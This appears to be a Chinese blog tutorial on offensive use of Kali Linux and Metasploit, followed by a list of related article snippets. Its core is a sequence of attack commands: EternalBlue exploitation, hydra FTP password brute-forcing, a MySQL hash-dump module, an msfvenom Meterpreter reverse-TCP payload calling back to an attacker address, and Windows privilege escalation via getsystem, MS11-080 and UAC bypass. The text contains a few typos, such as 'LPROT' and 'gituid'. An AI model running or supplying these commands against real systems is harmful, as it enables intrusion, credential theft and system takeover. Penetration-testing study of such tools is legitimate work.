linux 漏洞 msf,Kali Linux漏洞扫描、漏洞利用、MSF木马生成及权限提升篇

最新推荐文章于 2024-03-29 10:11:31 发布
最新推荐文章于 2024-03-29 10:11:31 发布
阅读量1.7k 收藏 14
点赞数 2
文章标签: linux 漏洞 msf

还是老样子,仅供有一定基础的朋友Kali Linux入门,毕竟这不是完整的详细教程,你不一定能看懂,但是原理是没任何问题的。以下都是一些简单的示例:其它的示例以此类推就可以了。

一、Kali Linux漏洞扫描

Web层面:Kali自带的owasp-zap、w3af

系统层面:Openvas、Nessus

二、Kali Linux漏洞利用

1、漏洞利用复现MS17-010测试

msf5 > use exploit/windows/smb/ms17_010_eternalblue

2、端口安全问题弱口令攻击

弱口令:FTP登陆

msf5 > use auxiliary/scanner/ftp/ftp_login

[email protected]:/# hydra -l user -P passlist.txt ftp://192.168.1.104

3、端口安全问题服务版本漏洞攻击

服务漏洞:MySQL 5.5.23

msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

三、Kali Linux MSF木马反弹程序生成技术

第一步:

[email protected]:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPROT=888 -f exe -o fujieace.exe

第二步:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

四、Kali Linux MSF权限提升

以下是以windows举例的,如果遇到Linux只需要选择相应的Linux模块即可!原理都是相同的。

第一种:自带的权限提升

meterpreter > gituid

meterpreter > getsystem

第二种:利用溢出漏洞提升

meterpreter > background

msf5 exploit(multi/handler) > use exploit/windows/local/ms11_080_afdjoinleaf

msf5 exploit(windows/local/ms11_080_afdjoinleaf) > set session 2

第三种:UAC权限提升

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

一代目
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF扫描漏洞模块
qq_41821067的博客
02-18 5479
目录DNS记录解析查询工具nslookupMSF 扫描模块nmap自动化扫描插件漏洞库小工具 参考博客 我们可以利用网站进行whois查询 https://www.benmi.com/whoishistory/ 可以通过 https://www.reg007.com/ 查看手机号查询过什么网站 DNS记录解析查询工具nslookup 如下两种查询方式 查询类型默认是NS名字服务器记录 MSF 扫描模块nmap 可以看到通过nmap可以看到端口开放信息 -sV 是查询开放端口 -V是省略 自动化扫描
kali linux135漏洞,Kali Linux渗透基础知识整理(二):漏洞扫描
weixin_34182361的博客
05-16 1592
漏洞扫描网络流量NmapHping3NessuswhatwebDirBusterjoomscanWPScan网络流量网络流量就是网络上传输的数据量。TCP协议TCP是因特网中的传输层协议,使用三次握手协议建立连接。当主动方发出SYN连接请求后,等待对方回答SYN+ACK ,并最终对对方的 SYN 执行 ACK 确认。这种建立连接的方法可以防止产生错误的连接,TCP使用的流量控制协议是可变大小的滑动...
MSF进行基本的漏洞扫描
Ethan024的博客
06-02 1275
监听目标服务器的80端口,并发送一个GET HTTP请求: kali@kali:~$ nc 192.168.168.228 80 get http 此时目标服务器会提供该端口上运行的Web服务器系统。
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
最新发布
2201_75735270的博客
03-29 1936
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
第三章-2 MSF扫描漏洞模块
划水的小白白
05-13 7077
本文内容: ~信息收集 ~扫描模块 ~自动化扫描插件 ~漏洞库小工具 一、信息收集 1,whois进阶收集信息 https://www.benmi.com/whoishistory/ 查询某站历史Whois信息 https://www.reg007.com/ 手机号注册过哪些网站 危害: 通过whois找到对方的管理员信息,例如名字,邮箱电话等, 进行密码组合生成新密码组合生成针对性的密码字典 密码存在
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞
kali linux msf系列视频教程
10-25
kali linux msf系列教程 -------------------------------------------- kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器...
MySQL数据库渗透及漏洞利用总结
02-20
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前...思想有多远,路就可以走多远,在研究mysql数据库安全之余,对Mysql如何通过msf、sqlmap等来进行扫描、漏洞
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使...
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解章,详细介绍kali的密码破解工具使用。
msfconsole漏洞扫描工具详解
有勇气的牛排博客
07-24 6777
目录1 msfconsole 介绍 1 msfconsole 介绍 msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如nmap、sqlmap等,可以直接在msfconsole里面使用。 kali可直接在命令使用: msfconsole Msfconsole的系统
msf弱点扫描
舞动的獾
07-15 779
VNC远程桌面 使用密码暴力破解模块 use auxiliary/scanner/vnc/vnc_login 标准的vnc开放的是5900端口 自带密码文件,cat命令查看后只有一个password,有点儿敷衍,可以自己更换密码。 破解出来,就可以使用vncconnect命令连接。 无密码vnc 基本不存在,看运气,能找到一个,几乎可以买彩票了。 – use auxiliary/scanner/vnc/vnc_none_auth RDP扫描测试 查看是否存在远程桌面漏洞 use auxiliary/s
Linux系统漏洞复现分析,linux 内核溢出漏洞利用分析
weixin_39732491的博客
04-29 249
0x01 环境搭建文件: centos6.9 x64位, linux-kernel-2.6.32.29 内核源码工具: qemu平台: archlinux打开终端,创建一个使用10G 的qcow2 文件Qemu-img create –f qcow2 centos.qcow2 10G开始安装centosQemu-system-x86_64 –hda centos.qco2 –m 1024M –bo...
MSF | 漏洞利用
君逍遥o
10-22 500
MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描漏洞利用以及提权等功能的工具。
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 4557
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
Metasploit学习之漏洞扫描
习惯积淀的博客
01-07 658
文章目录漏洞扫描专用漏洞扫描漏洞扫描 漏洞扫描器是一种能够自动在计算机、信息系统、网络以及应用软件中寻找和发现安全弱点的程序。它通过网络对目标系统进行探测,向目标系统发送数据,并将反馈数据与自带的漏洞特征库进行匹配,进而列举出目标系统上存在的安全漏洞。 由于各种操作系统网络模块的实现原理不同,所以对于接收到的探测数据会有不同的响应,漏洞扫描器可以根据不同的响应判断系统版本。 使用漏洞扫描器通...
msf系统漏洞利用说明
licheric的博客
10-19 1641
1、天镜、nessus、极光扫描器进行漏洞扫描,根据漏扫结果去msf里面进行查找漏洞利用工具 2、打开msf,通过search搜漏洞编号或漏洞名称 3、搜到漏洞之后,用use打开msf漏洞利用工具 4、输入info查看工具相关说明 5、用show options 查看工具使用方法 6、配置受害者ip set rhosts /set rport set payload 7、攻击run 或者 exploit ...
Nessus扫描系统漏洞MSF初级
赤赤三的博客
03-20 2701
系统扫描器nessus 的使用: 主机发现(涵盖了nmap的功能) 基本网络扫描(涵盖了web和漏洞的扫描) 认证补丁扫描(操作系统扫描) ping命令基于ICMP协议 天境包含漏洞库 可以工具扫描出来的漏洞进行比对 MSF的使用: 扫描出系统漏洞之后使用MSF漏洞利用框架进行验证,kali最强大的就是MSF,windows远程桌面命令:mstsc,Kali:rdesktop smb是共享文件的服务 ,modules/exploits/windows/smb,rdb是远程桌面连
渗透测试工具之Metasploit(MSF)扫描模块的简单使用
lzp_5257的博客
04-26 5639
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 MSF扫描模块的作用就是帮助我们进行信息收集 一、MSF与nmap的调用 漏洞扫描命令:(使用vuln脚本进行全面的漏洞扫描) db_nmap --script=vuln 192.168.xxx.xxx 指纹识别扫描命令:(扫描系统和程序版本号检测,并输出详细信息) db_nmap -sV -v 193.168.xxx.xxx 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import panda.
如何利用msf进行漏洞扫描
05-12
使用Metasploit Framework(MSF)进行漏洞扫描可以帮助您发现系统中存在的漏洞并提供相应的解决方案。以下是使用MSF进行漏洞扫描的步骤: 1. 安装Metasploit Framework:您可以从官方网站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值